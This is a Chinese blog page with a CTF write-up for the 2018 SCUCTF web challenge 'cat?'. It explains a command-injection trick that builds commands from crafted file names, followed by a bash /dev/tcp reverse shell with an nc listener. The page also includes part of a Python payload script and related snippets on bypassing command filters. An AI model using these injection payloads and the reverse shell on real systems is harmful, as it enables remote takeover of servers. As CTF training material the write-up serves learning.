2018 SCUCTF web题:cat?非常规题解

最新推荐文章于 2022-08-13 17:16:28 发布
最新推荐文章于 2022-08-13 17:16:28 发布
阅读量1.8k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/perfect0066/article/details/85108416
版权
本文介绍了在2018年SCUCTF中解决Web题目的一种非常规方法,包括寻找可写入目录,利用`>`构造文件名执行命令,创建反弹shell,并在服务器上设置监听。通过提供的Python脚本展示了具体实现过程。
摘要由CSDN通过智能技术生成

主要思路

1.寻找可以写入的目录
2.通过 > 构造文件名,在通过 ls -th>g 将命令写入文件
3.通过bash -i >& /dev/tcp/你的公网ip/监听的端口 0>&1构造反弹shell
4.在服务器使用 "nc -lnvp 相应端口"

python脚本如下

# -*- coding: utf8 -*-
import requests
import time
url='http://120.78.66.77:87/exec.php'

tmp='1.1.1.1;cd /t*;'

#生成ls -th >g
data1=[
	'>dir',
	'>sl',
	'>g\>',
	'>ht-',
	'*>v',
	'>rev',
	'*v>x',
	'cat x']

fo
最低0.47元/天 解锁文章
东坡何罪发文章总是审核不通过,去博客园了
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF之一天一:攻防世界的web进阶之Cat
qq_42728977的博客
08-27 1524
这个做的还是太明白,看了许多wp。在此小记录一下。 目这个鸭子,看到以为是sql注入,但又看是输入域名,然后返回ping的结果,又像是命令执行漏洞,于是各种姿势试,无果。开始看wp。 大佬们是先fuzz一波,发现当url=@的时候报错,而@的的url编码是%80, ...
[CTF目总结-web篇]攻防世界:Cat
T2hunz1
01-10 3945
[CTF目总结-web篇]攻防世界:Cat
SCUCTF
皮三宝好菜的博客
12-25 682
SCUCTF RE re1 拖进ida里一看就出来了 但是提交的时候答案是SCUCTF{}。。。。。。 没搞懂为啥,害得我调试了半天 re2 程序加壳了直接脱了后看伪代码 //第一次写的时候没脱壳。。。因为加密算法比较简答,就是和0x27逐个异或么。。。 上py a = [0x74, 0x5E, 0x5C, 0x75, 0x42, 0x51, 0x14, 0x55, 0x54, 0x42, ...
CTFHub技能树web(持续更新)--RCE--命令注入--过滤cat
jiuyongpinyin的博客
01-26 359
过滤cat 前面还是和上一篇文章一样,首先ping本机地址查看是否有回显,然后查看当前目录的文件: 看到了有flag字样的php文件,然后我们尝试使用cat,发现不行了: 在这里有很多种方法,可以使用单引号将cat包裹,还可以使用 sort 来查看: 查看网页源代码: 得到flag 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正 ...
CTFHub 命令注入-过滤cat
At0m的博客
01-14 3253
CTFHub 命令注入-过滤cat 第一还是看源码,首先是肯定是过滤了cat关键字,虽然看不太懂,但是才也是这样啊嘻嘻。 但是preg_match_all有三个参数,看一下,这三个参数分别是干什么的: <?php $userinfo = "Name: <b>PHP</b> <br> Title: <b>Programming Language</b>"; preg_match_all ("/<b>(.*)<\/b>/
蓝桥杯精选例:宇宙总统目及题解.zip
01-15
"蓝桥杯精选例:宇宙总统目及题解.zip" 是一个压缩包文件,它包含了与"蓝桥杯"编程竞赛相关的练习及其解答。蓝桥杯是一项在中国备受瞩目的编程竞赛,旨在提高学生的算法设计能力和编程技能。这个压缩包中的...
algorithms:各种各种算法题解
03-06
"algorithms:各种各种算法题解"这个压缩包文件,很显然是为了帮助学习者提高算法理解和实现能力,特别是通过JavaScript来实现。 1. **算法基础**:算法是一系列明确的指令,用于解决特定问或执行特定任务。它们...
NOI2018day2后面两个题解pdf
07-22
《NOI2018day2后面两个题解pdf》是一份针对全国青少年信息学奥林匹克竞赛(NOI)2018年第二天比赛的深度解析文档,由出人亲自讲解,旨在帮助参赛者理解和掌握比赛中的关键知识点。这份资源包含两个部分:...
2022美赛B题解-水电共享赛题解.zip
最新发布
01-21
【2022美赛B - 水电共享赛题解】 美赛,全称为美国数学建模竞赛(MCM/ICM),是一项国际性的数学竞赛,旨在鼓励学生应用数学和计算机科学解决实际问。2022年的美赛B,即“水电共享”,是一个涉及到水资源...
leetcode库-leetcode-web:以Web形式展示LeetCode题解,基于PythonFlask
06-29
LeetCode-Web 初始化 前端库依赖 下载,并将jquery-3.x.x.min.js移动到static目录下。 下载,并将semantic.min.js、semantic.min.css、components和themes移动到static/semantic目录下。 下载,并将jquery.pjax.js...
首届广西网络安全技术大赛初赛目-encoded.zip
02-22
首届广西网络安全技术大赛初赛目-encoded.zip
ctfhub-过滤cat
m0_62094846的博客
12-15 642
和之前那道差不多,不同的就是cat没用了 法一: 如果让cat不被过滤就可以了 127.0.0.1;a=c;b=at;$a$b flag_1659926138172.php或者127.0.0.1;a=c;b=at;${a}${b} flag_1659926138172.php
攻防世界-web-Cat(XCTF 4th-WHCTF-2017)
Sea_Sand息禅
07-08 1万+
打开网页,有一个云端测试功能,提示我们输入域名,输入几个进行测试 1) baidu.com 没有反馈 但是输入百度的ip:220.181.38.148,反馈如下 PING 220.181.38.148 (220.181.38.148) 56(84) bytes of data. --- 220.181.38.148 ping statistics --- 1 packets transm...
[CFI-CTF 2018]Kadyrov‘s Cat
wangjin7356的博客
04-01 665
目录 目链接 解过程 总结 目链接 https://buuoj.cn/challenges#[CFI-CTF%202018]Kadyrov's%20Cat过程 附上原的提示: A man from the soviet union has sent you two strange documents. Find the identity of the man as well as his location. Flag format is : CFI{Firs
NJCTF2017 线上赛 web 题解 By Assassin
Assassin
03-18 7055
Login打开以后出现一个登陆页面,下面有一个注册用户的链接。 打开申请界面 看着申请的密码还有要求不知道是不是目的关键点。 我们先申请一个账号登陆一下看看,发现是这样的 尝试申请一下admin发现已经存在了那么本的知识点是mysql变量名在输入太长的时候会被截断!!那么我们就可以构造不是admin但是阶段后是admin的用户名payload: username=admin
CTF命令执行与绕过
Rog's Blog
04-12 1436
浅谈CTF中命令执行与绕过的小技巧 一、空格绕过 1.cat<filename shell 2.cat<>filename shell 3.{cat,filename} shell 4.%09 符号 php 5.cat$IFS$9filename cat${IFS}filename shell 二、命令分隔符号 1.ls /;cat filename shell 2.ls /&cat filename shell 3.ls /|cat filename shell 4.%0a p
网络安全实验室CTF练习部分目(持续更新)
热门推荐
技术学习人生
06-29 8万+
1、脚本关:微笑一下,过关地址:http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php 查看源代码: include('flag.php'); $smile = 1; if (!isset ($_GET['^_^'])) $smile = 0; if (preg_match
基于UDP的网络聊天室
ctf1991的博客
08-13 397
基于UDP的网络聊天室
CTFlearn.writeup(web)
m0_38094687的博客
04-27 1304
CTFlean writeups(web) CTFlearn平台 Basic Injection payload: 1' or 1# POST practice 右键源码: &lt;!-- username: admin | password: 71urlkufpsdnlkadsf --&gt; post提交即可 Don’t Bump Your Head(er)...
VB2014编程实战:基本操作与应用题解
在这个VB2014操作中,主要考察了学生对基础图形控件的操作、事件处理以及简单的编程逻辑理解。以下是各个部分的详细知识点: 1. 基本操作: - 目要求在Form1窗体上创建一个文本框(Txt1)和一个命令按钮...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值